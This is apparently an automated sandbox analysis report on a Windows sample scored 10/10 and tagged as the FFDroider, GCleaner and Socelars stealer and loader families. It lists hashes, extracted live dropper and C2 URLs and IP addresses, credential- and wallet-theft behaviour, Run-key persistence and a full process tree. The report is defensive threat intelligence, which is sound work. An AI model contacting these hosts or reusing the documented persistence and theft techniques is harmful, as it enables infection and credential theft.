ffdroider | ad4fe1e40d5bd2e9881400aaaf00b43abdfcfcab35587923bd92067fa34d2059

Analysis

max time kernel
151s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
07/03/2023, 15:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

396KB
MD5

8786b658cc8531383511362b788f8f1c
SHA1

58da30ee843e7d5f51bdacca1ea495b84a7678fd
SHA256

ad4fe1e40d5bd2e9881400aaaf00b43abdfcfcab35587923bd92067fa34d2059
SHA512

d99b28db09067135359de87244a56d039399591d29c0bcf8c7d2163f934a938c4248239d87fcb6e99b9f0bce7132e95d0581ae32e73603af489f8b1444a44f5f
SSDEEP

12288:iQi3Qa6m6URA3PhNOZm2K7YOY5p2tpNnnTIg:iQiA5hhVFf4y3Tp

Score

10^/10

ffdroider gcleaner socelars evasion loader persistence spyware stealer vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.imagn.world/storage/debug2.ps1

Extracted

Family

gcleaner

45.12.253.56

45.12.253.72

45.12.253.98

45.12.253.75

Extracted

Family

socelars

https://hdbywe.s3.us-west-2.amazonaws.com/sadef33/

Signatures

FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5272	1264	rundll32.exe	34

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0006000000022fb8-219.dat	family_socelars
behavioral2/files/0x0006000000022fb8-220.dat	family_socelars

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Blocklisted process makes network request 3 IoCs

flow	pid	Process
124	2444	powershell.exe
137	2444	powershell.exe
178	2444	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Flabs1.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	Flabs1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	Dypysulibe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	chenp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	sqlcmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	gcleaner.exe

Executes dropped EXE 10 IoCs

pid	Process
5080	file.tmp
3236	Flabs1.exe
1460	Dypysulibe.exe
3896	Dypysulibe.exe
1788	gcleaner.exe
4280	handdiy_2.exe
2592	chenp.exe
2320	pb1117.exe
4680	sqlcmd.exe
4640	chenp.exe

Loads dropped DLL 2 IoCs

pid	Process
5080	file.tmp
5292	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/files/0x0006000000022fbd-255.dat	vmprotect
behavioral2/files/0x0006000000022fbd-256.dat	vmprotect
behavioral2/memory/2320-262-0x0000000140000000-0x0000000140619000-memory.dmp	vmprotect

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Dypysulibe.exe\""	Flabs1.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Program Files directory 15 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\f9c26779-303c-4abf-9b37-d75296de1c93.tmp	setup.exe
File created	C:\Program Files\Reference Assemblies\GTKYWIESSP\poweroff.exe	Flabs1.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\background.html	handdiy_2.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\jquery-3.3.1.min.js	handdiy_2.exe
File opened for modification	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js	handdiy_2.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230307160353.pma	setup.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\icon.png	handdiy_2.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js	handdiy_2.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\content.js	handdiy_2.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\manifest.json	handdiy_2.exe
File created	C:\Program Files (x86)\Reference Assemblies\Dypysulibe.exe	Flabs1.exe
File created	C:\Program Files (x86)\Reference Assemblies\Dypysulibe.exe.config	Flabs1.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\aes.js	handdiy_2.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\mode-ecb.js	handdiy_2.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\pad-nopadding.js	handdiy_2.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 10 IoCs

pid	pid_target	Process	procid_target
4636	1788	WerFault.exe	92
4292	1788	WerFault.exe	92
5220	1788	WerFault.exe	92
5356	5292	WerFault.exe	132
5464	1788	WerFault.exe	92
5812	1788	WerFault.exe	92
6064	1788	WerFault.exe	92
872	1788	WerFault.exe	92
5264	1788	WerFault.exe	92
5640	1788	WerFault.exe	92

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3416	taskkill.exe
5288	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133226786309471112"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5832	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	94	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe
3896	Dypysulibe.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3236	Flabs1.exe
Token: SeDebugPrivilege	1460	Dypysulibe.exe
Token: SeDebugPrivilege	3896	Dypysulibe.exe
Token: SeCreateTokenPrivilege	4280	handdiy_2.exe
Token: SeAssignPrimaryTokenPrivilege	4280	handdiy_2.exe
Token: SeLockMemoryPrivilege	4280	handdiy_2.exe
Token: SeIncreaseQuotaPrivilege	4280	handdiy_2.exe
Token: SeMachineAccountPrivilege	4280	handdiy_2.exe
Token: SeTcbPrivilege	4280	handdiy_2.exe
Token: SeSecurityPrivilege	4280	handdiy_2.exe
Token: SeTakeOwnershipPrivilege	4280	handdiy_2.exe
Token: SeLoadDriverPrivilege	4280	handdiy_2.exe
Token: SeSystemProfilePrivilege	4280	handdiy_2.exe
Token: SeSystemtimePrivilege	4280	handdiy_2.exe
Token: SeProfSingleProcessPrivilege	4280	handdiy_2.exe
Token: SeIncBasePriorityPrivilege	4280	handdiy_2.exe
Token: SeCreatePagefilePrivilege	4280	handdiy_2.exe
Token: SeCreatePermanentPrivilege	4280	handdiy_2.exe
Token: SeBackupPrivilege	4280	handdiy_2.exe
Token: SeRestorePrivilege	4280	handdiy_2.exe
Token: SeShutdownPrivilege	4280	handdiy_2.exe
Token: SeDebugPrivilege	4280	handdiy_2.exe
Token: SeAuditPrivilege	4280	handdiy_2.exe
Token: SeSystemEnvironmentPrivilege	4280	handdiy_2.exe
Token: SeChangeNotifyPrivilege	4280	handdiy_2.exe
Token: SeRemoteShutdownPrivilege	4280	handdiy_2.exe
Token: SeUndockPrivilege	4280	handdiy_2.exe
Token: SeSyncAgentPrivilege	4280	handdiy_2.exe
Token: SeEnableDelegationPrivilege	4280	handdiy_2.exe
Token: SeManageVolumePrivilege	4280	handdiy_2.exe
Token: SeImpersonatePrivilege	4280	handdiy_2.exe
Token: SeCreateGlobalPrivilege	4280	handdiy_2.exe
Token: 31	4280	handdiy_2.exe
Token: 32	4280	handdiy_2.exe
Token: 33	4280	handdiy_2.exe
Token: 34	4280	handdiy_2.exe
Token: 35	4280	handdiy_2.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	3416	taskkill.exe
Token: SeDebugPrivilege	5288	taskkill.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe
Token: SeShutdownPrivilege	5920	chrome.exe
Token: SeCreatePagefilePrivilege	5920	chrome.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
2148	msedge.exe
2148	msedge.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2592	chenp.exe
2592	chenp.exe
4640	chenp.exe
4640	chenp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 5080	2936	file.exe	86
PID 2936 wrote to memory of 5080	2936	file.exe	86
PID 2936 wrote to memory of 5080	2936	file.exe	86
PID 5080 wrote to memory of 3236	5080	file.tmp	87
PID 5080 wrote to memory of 3236	5080	file.tmp	87
PID 3236 wrote to memory of 1460	3236	Flabs1.exe	88
PID 3236 wrote to memory of 1460	3236	Flabs1.exe	88
PID 3236 wrote to memory of 3896	3236	Flabs1.exe	89
PID 3236 wrote to memory of 3896	3236	Flabs1.exe	89
PID 3896 wrote to memory of 1020	3896	Dypysulibe.exe	90
PID 3896 wrote to memory of 1020	3896	Dypysulibe.exe	90
PID 1020 wrote to memory of 1788	1020	cmd.exe	92
PID 1020 wrote to memory of 1788	1020	cmd.exe	92
PID 1020 wrote to memory of 1788	1020	cmd.exe	92
PID 1460 wrote to memory of 2148	1460	Dypysulibe.exe	93
PID 1460 wrote to memory of 2148	1460	Dypysulibe.exe	93
PID 3896 wrote to memory of 928	3896	Dypysulibe.exe	94
PID 3896 wrote to memory of 928	3896	Dypysulibe.exe	94
PID 3896 wrote to memory of 4228	3896	Dypysulibe.exe	96
PID 3896 wrote to memory of 4228	3896	Dypysulibe.exe	96
PID 2148 wrote to memory of 1472	2148	msedge.exe	99
PID 2148 wrote to memory of 1472	2148	msedge.exe	99
PID 928 wrote to memory of 4280	928	cmd.exe	102
PID 928 wrote to memory of 4280	928	cmd.exe	102
PID 928 wrote to memory of 4280	928	cmd.exe	102
PID 4228 wrote to memory of 2592	4228	cmd.exe	103
PID 4228 wrote to memory of 2592	4228	cmd.exe	103
PID 4228 wrote to memory of 2592	4228	cmd.exe	103
PID 3896 wrote to memory of 4776	3896	Dypysulibe.exe	105
PID 3896 wrote to memory of 4776	3896	Dypysulibe.exe	105
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107
PID 2148 wrote to memory of 4716	2148	msedge.exe	107

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Users\Admin\AppData\Local\Temp\is-T0DM8.tmp\file.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-T0DM8.tmp\file.tmp" /SL5="$B01BE,146662,62976,C:\Users\Admin\AppData\Local\Temp\file.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\Users\Admin\AppData\Local\Temp\is-K8S4A.tmp\Flabs1.exe
    "C:\Users\Admin\AppData\Local\Temp\is-K8S4A.tmp\Flabs1.exe" /S /UID=flabs1
    3⤵
    - Drops file in Drivers directory
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3236
  - - C:\Users\Admin\AppData\Local\Temp\c7-10740-f51-097bb-405f333c97148\Dypysulibe.exe
      "C:\Users\Admin\AppData\Local\Temp\c7-10740-f51-097bb-405f333c97148\Dypysulibe.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        5⤵
        Enumerates system info in registry
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:2148
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7ffeaf6946f8,0x7ffeaf694708,0x7ffeaf694718
        6⤵
        
        PID:1472
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        6⤵
        
        PID:4716
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
        6⤵
        
        PID:4996
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
        6⤵
        
        PID:4364
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
        6⤵
        
        PID:4220
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
        6⤵
        
        PID:1040
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
        6⤵
        
        PID:5496
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
        6⤵
        
        PID:3396
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
        6⤵
        
        PID:4032
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
        6⤵
        
        PID:5132
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
        6⤵
        
        PID:5144
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
        6⤵
        
        PID:5548
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        6⤵
        Drops file in Program Files directory
        
        PID:5484
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6c7985460,0x7ff6c7985470,0x7ff6c7985480
        7⤵
        
        PID:6100
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
        6⤵
        
        PID:396
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,6086074259856087459,11169537816188567429,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3524 /prefetch:2
        6⤵
        
        PID:2340
